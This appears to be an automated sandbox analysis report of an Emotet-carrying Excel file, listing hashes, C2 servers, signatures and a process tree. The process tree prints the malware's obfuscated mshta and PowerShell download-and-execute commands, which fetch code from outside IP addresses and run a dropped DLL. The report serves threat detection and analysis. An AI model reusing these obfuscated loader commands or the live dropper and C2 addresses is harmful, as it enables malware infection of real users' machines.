Analysis

  • max time kernel
    153s
  • max time network
    158s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    20-01-2022 12:12

General

  • Target

    279edf8210c724455a6136187a1c62b8298d256dfa42875ee8c8695a49cd1257.xls

  • Size

    142KB

  • MD5

    479ce294962829b0994744dd0a5bff14

  • SHA1

    ac79edae6353fb779e9dfad843193915e4667ce2

  • SHA256

    279edf8210c724455a6136187a1c62b8298d256dfa42875ee8c8695a49cd1257

  • SHA512

    1ddd7e68fa08763d43b10ce5211034049b22f9d8bb30b600f85b3279f4394890aaba2899623d7404f5975012d5494f83ee0357451393d3819e48e381afa7612d

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xb907d607/fer/fer.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/fer/fer.png

Extracted

Family

emotet

Botnet

Epoch4

C2

131.100.24.231:80

209.59.138.75:7080

103.8.26.103:8080

51.38.71.0:443

212.237.17.99:8080

79.172.212.216:8080

207.38.84.195:8080

104.168.155.129:8080

178.79.147.66:8080

46.55.222.11:443

103.8.26.102:8080

192.254.71.210:443

45.176.232.124:443

203.114.109.124:443

51.68.175.8:8080

58.227.42.236:80

45.142.114.231:8080

217.182.143.207:443

178.63.25.185:443

45.118.115.99:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\279edf8210c724455a6136187a1c62b8298d256dfa42875ee8c8695a49cd1257.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2352
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3236
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2360
        • C:\Windows\system32\mshta.exe
          mshta http://0xb907d607/fer/fer.html
          3⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:3880
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fer.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:364
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:576
              • C:\Windows\SysWow64\rundll32.exe
                C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
                6⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1644
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                  7⤵
                  • Loads dropped DLL
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:2784
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cqjiwynhhbgup\ulecczgdel.olj",NHhujY
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2208
                    • C:\Windows\SysWOW64\rundll32.exe
                      C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cqjiwynhhbgup\ulecczgdel.olj",DllRegisterServer
                      9⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2740
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 3880 -s 1668
            4⤵
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:812

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\Documents\ssd.dll

      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll

      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll

      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • memory/364-553-0x0000022BF6490000-0x0000022BF64B2000-memory.dmp

      Filesize

      136KB

    • memory/364-585-0x0000022BF64E3000-0x0000022BF64E5000-memory.dmp

      Filesize

      8KB

    • memory/364-602-0x0000022BF64E6000-0x0000022BF64E8000-memory.dmp

      Filesize

      8KB

    • memory/364-572-0x0000022BF67A0000-0x0000022BF67DC000-memory.dmp

      Filesize

      240KB

    • memory/364-584-0x0000022BF6C10000-0x0000022BF6C86000-memory.dmp

      Filesize

      472KB

    • memory/364-583-0x0000022BF64E0000-0x0000022BF64E2000-memory.dmp

      Filesize

      8KB

    • memory/1644-613-0x0000000000880000-0x00000000008A6000-memory.dmp

      Filesize

      152KB

    • memory/2208-629-0x0000000000C60000-0x0000000000C86000-memory.dmp

      Filesize

      152KB

    • memory/2352-116-0x00007FFDCB810000-0x00007FFDCB820000-memory.dmp

      Filesize

      64KB

    • memory/2352-128-0x00007FFDCB810000-0x00007FFDCB820000-memory.dmp

      Filesize

      64KB

    • memory/2352-118-0x00007FFDCB810000-0x00007FFDCB820000-memory.dmp

      Filesize

      64KB

    • memory/2352-117-0x00007FFDCB810000-0x00007FFDCB820000-memory.dmp

      Filesize

      64KB

    • memory/2352-129-0x00007FFDC85C0000-0x00007FFDC85D0000-memory.dmp

      Filesize

      64KB

    • memory/2352-127-0x00007FFDC85C0000-0x00007FFDC85D0000-memory.dmp

      Filesize

      64KB

    • memory/2352-670-0x00007FFDCB810000-0x00007FFDCB820000-memory.dmp

      Filesize

      64KB

    • memory/2352-669-0x00007FFDCB810000-0x00007FFDCB820000-memory.dmp

      Filesize

      64KB

    • memory/2352-668-0x00007FFDCB810000-0x00007FFDCB820000-memory.dmp

      Filesize

      64KB

    • memory/2352-667-0x00007FFDCB810000-0x00007FFDCB820000-memory.dmp

      Filesize

      64KB

    • memory/2352-115-0x00007FFDCB810000-0x00007FFDCB820000-memory.dmp

      Filesize

      64KB

    • memory/2740-630-0x0000000000C30000-0x0000000000C56000-memory.dmp

      Filesize

      152KB

    • memory/2740-633-0x0000000004540000-0x0000000004566000-memory.dmp

      Filesize

      152KB

    • memory/2784-627-0x0000000004B50000-0x0000000004B76000-memory.dmp

      Filesize

      152KB

    • memory/2784-625-0x0000000004A00000-0x0000000004A26000-memory.dmp

      Filesize

      152KB

    • memory/2784-623-0x00000000049A0000-0x00000000049C6000-memory.dmp

      Filesize

      152KB

    • memory/2784-621-0x0000000004840000-0x0000000004866000-memory.dmp

      Filesize

      152KB

    • memory/2784-618-0x0000000000FF0000-0x0000000001016000-memory.dmp

      Filesize

      152KB

    • memory/2784-616-0x0000000000CF0000-0x0000000000D16000-memory.dmp

      Filesize

      152KB